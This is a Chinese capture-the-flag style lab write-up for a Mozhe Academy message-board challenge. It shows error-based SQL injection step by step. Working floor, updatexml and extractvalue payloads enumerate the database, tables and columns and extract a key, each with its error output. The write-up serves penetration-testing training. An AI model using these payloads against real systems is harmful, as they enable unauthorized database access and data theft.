背景介绍
最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份。
实训目标
1、熟练掌握留言板的工作原理;
2、善用burp抓取数据包;
解题方向
抓取数据包加以分析。
1、判断注入类型
在?Id=62后面输入单引号报错,初步判定存在报错型注入,报错型注入的方法大概有10种左右,这里分别使用floor、updatexml和extractvalue三种方法。其他的exp、multipoint貌似不太行。
2、获取当前数据库信息
and (select 1 from(select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(select database()),0x7e),1))
==============================================================================
and (extractvalue(1, concat(0x5c,(select database()))))
==============================================================================
得到数据库为“pikaqiu”
XPATH syntax error: ‘\pikaqiu’
3、获取数据库中表
and (select 1 from(select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='
pikaqiu'),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikaqiu'),0x7e),1))
==============================================================================
and (extractvalue(1, concat(0x5c,(select table_name from information_schema.tables where table_schema='pikaqiu'))))
XPATH syntax error: ‘\message’
得到“message”表
4、获取表中列信息
and (select 1 from(select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='message' limit 3,1),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='message' limit 3,1),0x7e),1))
==============================================================================
and (extractvalue(1, concat(0x5c,(select column_name from information_schema.columns where table_name='message' limit 3,1))))
调整limit第一位数字得到列:“id”“content”“key” "time“
XPATH syntax error: ‘\key’
5、获取key值
and (select 1 from(select count(*),concat(0x3a,0x3a,(SELECT concat_ws(':', `key`) FROM message limit 0,1)),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(SELECT concat_ws(':', `key`) FROM message limit 0,1),0x7e),1))
==============================================================================
and extractvalue(1,concat(0x5c,(SELECT concat_ws(':', `key`) FROM message limit 0,1)))
==============================================================================
得到key值:
XPATH syntax error: ‘\mozheb18e10d2fbffaffbb315bf22d2’
6、总结
总结:在获取key值的时候使用floor方法无法获取到,不知道是啥原因,另外两种方法在concat_ws()里面必须添加‘:’字段,不明白为什么。
另外:
sqlmap是跑不出来key值的。。。
sqlmap是跑不出来key值的。。。
sqlmap是跑不出来key值的。。。